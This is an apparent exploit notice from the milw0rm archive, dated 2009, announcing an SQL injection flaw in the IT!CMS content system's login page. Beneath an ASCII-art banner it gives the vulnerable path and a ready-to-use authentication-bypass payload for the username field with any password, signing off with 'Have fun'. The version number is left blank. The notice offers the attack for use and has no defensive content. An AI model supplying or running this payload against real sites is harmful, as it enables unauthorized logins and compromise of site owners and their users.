__ .__ .___ __ .__ ____ ____________/ |______ |__| ____ __| _/____ _____ _/ |_| |__ _/ ___\/ __ \_ __ \ __\__ \ | |/ \ / __ |/ __ \\__ \\ __\ | \ \ \__\ ___/| | \/| | / __ \| | | \/ /_/ \ ___/ / __ \| | | Y \ \___ >___ >__| |__| (____ /__|___| /\____ |\___ >____ /__| |___| / \/ \/ \/ \/ \/ \/ \/ \/ --+++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+++-- --+++~~~~~ IT!CMS <= vers. SQL Injection Vulnerability ~~~~~+++-- --+++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+++-- [+] Discovered by: certaindeath [+] Exploit: simple SQL injection [+] Path: [cms dir]/login.php [+] Username: ' OR 'x' = 'x [+] Password: anything [+] Have fun ^^ # milw0rm.com [2009-01-06]